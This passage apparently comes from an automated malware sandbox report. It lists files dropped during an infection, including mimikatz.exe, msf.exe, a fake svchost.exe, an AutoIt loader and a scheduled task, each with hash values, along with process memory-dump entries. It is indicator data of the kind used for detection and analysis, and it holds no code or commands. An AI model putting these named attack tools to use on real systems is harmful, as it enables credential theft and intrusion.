| SHA512 | 59bc369bf7d96865be7e2f0b148e8216804c7f85d59958e7cc142770b44a84a266db8aec05b28bed483828f84abd81a21b3d40cdda230c1a534f6b380a387c44 |
C:\Users\Admin\Desktop\Files\XM.exe
| MD5 | 0940599cefe789664d6a032a27b25b73 |
| SHA1 | c6ee1fe58fdd7ba3c3f3d0e708228e53050cf4fa |
| SHA256 | ed42c5f70c10694c1376f330cfbdcee52b72aed3b7eb25debcc1b2ba613c0922 |
| SHA512 | 47c01da51b42cb086202d05f01613d81b75e37a8b718f13597a18d8693e3a6f8666d28d9c79abcd143d1d3c93d7a4051e551f4354306a7b57507967bc9adf781 |
memory/5492-6596-0x0000000000650000-0x0000000000704000-memory.dmp
memory/5492-6597-0x0000000001070000-0x0000000001152000-memory.dmp
C:\Users\Admin\Desktop\Files\xxx.exe
| MD5 | 708adef6da5ac2ffee5f01f277560749 |
| SHA1 | 3dedb41674634e6b53dfaea704754cee7bddfbe3 |
| SHA256 | 0fec722a795adc9e313422c62e8ff0c7dac935dfef78da6560e38455a7739e4a |
| SHA512 | 463927da961a3a52199d2a70dbf51aed7b600e45da5e71c73c9ea9b9971c32fc77b3f1d442400a4a4fe4d0a5bc024893f633a5d898dd9e955b9ed3a8d0d3ce28 |
C:\Users\Admin\Desktop\Files\surfex.exe
| MD5 | 1f4b0637137572a1fb34aaa033149506 |
| SHA1 | c209c9a60a752bc7980a3d9d53daf4b4b32973a9 |
| SHA256 | 60c645c0a668c13ad36d2d5b67777dedf992e392e652e7f0519f21d658254648 |
| SHA512 | 4fd27293437b8bf77d15d993da2b0e75c9fba93bd5f94dad439a3e2e4c16c444f6a32543271f1d2ad79c220354b23301e544765ca392fc156267a89338452e86 |
memory/6936-9541-0x0000000000B00000-0x0000000000B54000-memory.dmp
memory/6204-9556-0x0000000000400000-0x0000000000450000-memory.dmp
memory/5492-9559-0x0000000000EE0000-0x0000000000F2C000-memory.dmp
memory/5492-9558-0x0000000001150000-0x00000000011C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TmpF7C8.tmp
| MD5 | 1420d30f964eac2c85b2ccfe968eebce |
| SHA1 | bdf9a6876578a3e38079c4f8cf5d6c79687ad750 |
| SHA256 | f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9 |
| SHA512 | 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8 |
memory/6204-9584-0x0000000005D20000-0x0000000005D96000-memory.dmp
memory/6204-9587-0x0000000006730000-0x000000000676C000-memory.dmp
memory/6204-9586-0x0000000005DC0000-0x0000000005DD2000-memory.dmp
memory/6204-9588-0x0000000006770000-0x00000000067BC000-memory.dmp
memory/6204-9585-0x0000000006800000-0x000000000690A000-memory.dmp
memory/6524-9643-0x00000000008A0000-0x00000000008B2000-memory.dmp
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\SETUP.EX_
| MD5 | 1a59a8af3c58b30ff0fe71db2196b24b |
| SHA1 | 6b0e5ba36f4fc5328ec494272054a50cafa13e68 |
| SHA256 | ba25974b29a25cb7bc1f58a0990a8ce758354aa6ec5b8b8af210f2c1466ba49d |
| SHA512 | f173fe15db8d7aeef4f6fa62a41246550ccee207e6388095a5f87036362d4c95da646e1a7c68764054556e024da80b749646425076e9bfac42fb77be8f2c0355 |
memory/8180-9860-0x0000000000F40000-0x0000000001264000-memory.dmp
memory/6440-9944-0x0000000000370000-0x0000000000694000-memory.dmp
memory/6956-10064-0x0000000000B50000-0x0000000000E74000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\temp_16933.exe
| MD5 | e18ff32f235079a5b06d8ef0b5e135d4 |
| SHA1 | 30782031c29c370b4637882202776bc092b2b098 |
| SHA256 | 99703b09d6585f8ef49bdefba101a9f388056a393f7b3b5bfc42d44835f80ca4 |
| SHA512 | b884b5551063e8a4516b25d957728295c97f3bb16d01834b84a54d2dd512beb24c8df91e87040b2c8738d36786b7d94c3fa2257c7ba644890794e67f1df262d3 |
C:\Users\Admin\AppData\Local\Temp\temp_16943.exe
| MD5 | eba33219c7bdec31cab46dc3c5735e76 |
| SHA1 | bf9339f46d7a33d342aeb7fca8b5d5fb8b4d165a |
| SHA256 | 4d9440023af17170008531098b4a9e25f4fcfd29782c872a5e616fcb33dfa6f6 |
| SHA512 | a74c43e45ff7e771065879b640097a169b49225ebcfa747351db445a4f253105b7535e438a7e4e82e13b9a9fcc62f6cfe49a8760499f9e9efc2002a965a43774 |
memory/6260-10169-0x00007FF6D9520000-0x00007FF6D95B5000-memory.dmp
memory/6260-10176-0x00007FF6D9520000-0x00007FF6D95B5000-memory.dmp
memory/8112-10188-0x0000000000FA0000-0x0000000000FB2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
| MD5 | 74b69084450d644a129195282bfb0f9a |
| SHA1 | ffb7f2d1a9b989a5f0efeb9dbdb7d09e57dcdfdd |
| SHA256 | 19018d9b0bf2ca78774d3ffdfed4513f6cc6e17a8f4ba80a2cb7f37270ac97ba |
| SHA512 | 9005de844e55e3cfabd30f03bbebfb46e3a554c3ef0f19f41fc660ffeff66f5bf62161ed8f85aa5c4559efde0e865e8dd17df8a63219abfa8fe1d511910d3242 |
memory/8088-10364-0x0000000000DD0000-0x00000000010F4000-memory.dmp
C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log
| MD5 | e46aaf1691c780f9bbdb68feb90024b8 |
| SHA1 | 05c3be0a3f8b047cadaec75b5bd59a3fa5ba9586 |
| SHA256 | b0f233e452a86af1c91466ed94ec94e37f02e6a939f16a9ed969c73dc3baa83e |
| SHA512 | 0cdc338b7b97e38acec66e37df578e31c28ad3cb484111ab0e2297cee64fe98b67d42538e8caddf279f9582efe816a4ec3c76bac638a219756fde7b60a94fdb9 |
memory/4592-10686-0x0000000000E00000-0x0000000001124000-memory.dmp
memory/6960-10799-0x00000000009B0000-0x0000000000CD4000-memory.dmp
memory/7296-10866-0x0000000000AB0000-0x0000000001082000-memory.dmp
memory/7296-10876-0x0000000005D40000-0x0000000005EC6000-memory.dmp
memory/7296-10877-0x0000000005920000-0x0000000005942000-memory.dmp
C:\Users\Admin\Desktop\Files\svchost.exe
| MD5 | da4b81bd7225f06fa1ff1a6c0f50c69f |
| SHA1 | e630b7442a8f9cf9945216dcab8e750ebd01e307 |
| SHA256 | 01c295a6690c48ff3196ff3ef0fef7383bdba9beaa6dadf8426e689263be5e20 |
| SHA512 | 57017466deb54d0a7a582a5352cbc90600b08cc4b0bd7c0ebf017d30f008507ef9d5257920bc76ffb0e271b9dc358eed7dadefbb2d305d4f6da53bf51a65d3f0 |
memory/4104-10991-0x0000000000E90000-0x0000000000EA6000-memory.dmp
memory/7192-11030-0x0000000000D80000-0x00000000010A4000-memory.dmp
memory/4664-11237-0x0000000000A40000-0x0000000000D64000-memory.dmp
memory/2140-11531-0x0000000000A20000-0x0000000000D44000-memory.dmp
memory/6692-11657-0x0000000000CF0000-0x0000000001014000-memory.dmp
memory/6836-11778-0x0000000000930000-0x0000000000C54000-memory.dmp
memory/6028-12008-0x0000000000D20000-0x0000000001044000-memory.dmp
C:\ProgramData\adbabbcfdbc.cfg
| MD5 | 7712f3490a250619730314c9e76971ef |
| SHA1 | 1e15ddfcf03033cfc45d7e7d603cfd4d3720a086 |
| SHA256 | 972bcf2d3f9c22628cc3fb6b478085c3616a2053eea636462a2ea84407164f24 |
| SHA512 | 7c498573dd89ba140ea4a824f5df16e6d57b6755d3fcad5413579d2739b375669c5778874e81b93aba695ff3fc6a387b975fbac964b51c4ebf9b2abb8279aa5f |
memory/7892-12121-0x0000000000A20000-0x000000000119B000-memory.dmp
memory/2740-12187-0x0000000000680000-0x00000000009A4000-memory.dmp
memory/7892-12188-0x0000000000A20000-0x000000000119B000-memory.dmp
memory/6652-12291-0x00000000008E0000-0x0000000000C04000-memory.dmp
memory/7084-12305-0x0000000000A20000-0x000000000119B000-memory.dmp
memory/7084-12372-0x0000000000A20000-0x000000000119B000-memory.dmp
memory/6352-12456-0x0000000000A20000-0x000000000119B000-memory.dmp
memory/6352-12572-0x0000000000A20000-0x000000000119B000-memory.dmp
memory/6880-12595-0x0000000000A70000-0x0000000000A82000-memory.dmp
memory/5952-12835-0x0000000000610000-0x0000000000934000-memory.dmp
C:\ProgramData\wvtynvwe\AutoIt3.exe
| MD5 | 0adb9b817f1df7807576c2d7068dd931 |
| SHA1 | 4a1b94a9a5113106f40cd8ea724703734d15f118 |
| SHA256 | 98e4f904f7de1644e519d09371b8afcbbf40ff3bd56d76ce4df48479a4ab884b |
| SHA512 | 883aa88f2dba4214bb534fbdaf69712127357a3d0f5666667525db3c1fa351598f067068dfc9e7c7a45fed4248d7dca729ba4f75764341e47048429f9ca8846a |
C:\Users\Admin\Desktop\Files\856.exe
| MD5 | 68edafe0a1705d5c7dd1cb14fa1ca8ce |
| SHA1 | 7e9d854c90acd7452645506874c4e6f10bfdda31 |
| SHA256 | 68f0121f2062aede8ae8bd52bba3c4c6c8aa19bdf32958b4e305cf716a92cc3d |
| SHA512 | 89a965f783ea7f54b55a542168ff759e851eae77cdfa9e23ba76145614b798f0815f2feb8670c16f26943e83bba2ade0649d6dc83af8d87c51c42f96d015573d |
memory/3724-13081-0x0000000000450000-0x0000000000686000-memory.dmp
C:\Users\Admin\Desktop\Files\ciscotest.exe
| MD5 | 0076324b407d0783137badc7600327a1 |
| SHA1 | 29e6cb1f18a43b8e293539d50272898a8befa341 |
| SHA256 | 55c727a9806966ec83f22702c1101c855a004c5658cf60e3c3499f895b994583 |
| SHA512 | 96b08dd1a7abccefabe3568637c17f6ae2c04349488db8dc05b9dcaaaef6a041c36fa4a1f1841096d6622b9775099c7c7eb1497c57581cb444afeb481563cae4 |
memory/3724-13090-0x0000000005150000-0x000000000522C000-memory.dmp
memory/3724-14227-0x0000000005310000-0x0000000005368000-memory.dmp
memory/3724-14565-0x00000000050C0000-0x0000000005114000-memory.dmp
C:\Windows\System32\Tasks\Test Task17
| MD5 | b929f752eefcbc69fa7b6c4cb52b3a00 |
| SHA1 | dfaa828faa819a31c73e309dd1819f3446fab996 |
| SHA256 | 4023bb6ef24afd8412072ff49790efffba497a7f6bf1b8fd2f81e53c42064e8a |
| SHA512 | d3b0983f53142828a0c4c68e6bdbf5c7a5f13810b5cfee2c466b2e2da5c6953d009803712cd346b292f7d0419c9a70872e904fc1b9d4eb933ff950314825bd2f |
C:\Users\Admin\Desktop\Files\msf.exe
| MD5 | 8597aa1db8457c9b8e2e636c55a56978 |
| SHA1 | d6ee74a13ee56eb7556e88b5b646e1c3581bf163 |
| SHA256 | e1579bd0d471cdfbcadbb1b27454da080a6a5e13021033208b7592ccea607320 |
| SHA512 | 943299ec65c1ebf0e74725648419ca76bdba72cbc39accb63305f57bba45c88227e9df80aebea9dfe47014c534e7067e7e844584356c6a39097d816c27c6a22f |
memory/6812-15987-0x0000000000340000-0x0000000000664000-memory.dmp
memory/7356-16074-0x0000000000230000-0x0000000000554000-memory.dmp
memory/2724-16198-0x0000000000C60000-0x0000000000F84000-memory.dmp
memory/4784-16202-0x0000000000560000-0x0000000000884000-memory.dmp
C:\Users\Admin\Desktop\Files\mimikatz.exe
| MD5 | 6dca8f740c1d76413c77796c7344d861 |
| SHA1 | e747301f18bdedd2b06794a0d372ce11db8370ae |
| SHA256 | 2280e717c054c708e8930acfda84805c5ac05eced6c06a0146f836ce2f5a00ec |
| SHA512 | f7cb58a9001821cbeba7720d724715d7d3c58e2518ef36eb234095023d498bbf49a25214ad15f8297afbfdb8f26001b8b18495c64daec6a3deb4490f347dc892 |
C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe
| MD5 | 2b8f487213f3da1f42779e22d7b02d1a |
| SHA1 | 77c96429d6facbd1900290c9cbfed378103b8e01 |
| SHA256 | a4da37e92ca54c8851ad144fba875b61e2018f69bbe43b11926d8f8d831b56f0 |
| SHA512 | 2db88a30fdfc1e859edb7229b2073449b5d57640e484e21d78047fd674fc194c2c790995621b4d0ed7927ec06e8325c7333a1893227e50d38b2559fc267cc6bf |
memory/6288-16528-0x0000000000BD0000-0x0000000000CB6000-memory.dmp
C:\Users\Admin\Desktop\Files\winX32.exe
| MD5 | eee37f6f66eafa13d9555dfc9ccb3805 |
| SHA1 | c9b2dd6b4bd464cb767b5ff1260dc07e223cd0b8 |
| SHA256 | ca569ad2e113c57c5ddeb1770ae4d63f579df3504306097ff8a16b1cb37dcaa9 |
| SHA512 | 9bf9709f3a1dcdf97d7c88e133702f0c46756125b65adc7b6b3d61ed7b624aa5212729f7fe95c35ef1d457175c3613b4deaf625268c9651e8bdd57201c379218 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
| MD5 | 4bd39015c30927b5aade8b354ae4967d |
| SHA1 | e74e6c5d906f71736d9d5410daaa087f28ee78bd |
| SHA256 | 4b85f8a124c2a808e6f7e327354aaab86403dd3270d8e0f0e182ca3587d0a8d9 |
| SHA512 | ede8db463da500f4272fcdc2901a51b9196818d5f4de38294d43522a4636210f4cd7f1776f72e912f98b96f30d1491c9e4d817a1f6f760f3e780bd196affcbe4 |
C:\Users\Admin\AppData\Roaming\app
| MD5 | bbcd2be775370c1e106e66d077a93f3b |
| SHA1 | a44b6a98f30e3275fc304bc3b29e0eab8ae47f20 |
| SHA256 | a7aa76f137ba550c381cfb8e5195a01963ae49db167e1cd1e0a8b902ed81eda1 |
| SHA512 | bb6e0d1f24253a9525fd538debf8ca68eb7078cb8539140c184331a854ecdea192fbcc314c4154a0a474c9aec41a79efeb8150922454c3c9e71eeb5297ae2f72 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Discord.exe.log
| MD5 | b4e91d2e5f40d5e2586a86cf3bb4df24 |
| SHA1 | 31920b3a41aa4400d4a0230a7622848789b38672 |
| SHA256 | 5d8af3c7519874ed42a0d74ee559ae30d9cc6930aef213079347e2b47092c210 |
| SHA512 | 968751b79a98961f145de48d425ea820fd1875bae79a725adf35fc8f4706c103ee0c7babd4838166d8a0dda9fbce3728c0265a04c4b37f335ec4eaa110a2b319 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
| MD5 | 592ab7edba153a868690f737ca51b7e2 |
| SHA1 | aa5381cd2f1b7ae954b369212b748c5d348e3002 |
| SHA256 | 7632ef4855cf6d0ec1b69def6853378ca049484b4361e10139bbb727a68fe03a |
| SHA512 | c26c4fa0f310c8932bdaff7c83d5081214ebf5109a71181767cccc9adbc0233d18ab9627e01f3b3f83f7ffdde71af0cda6e6c2345845f07650f6108a5d98682e |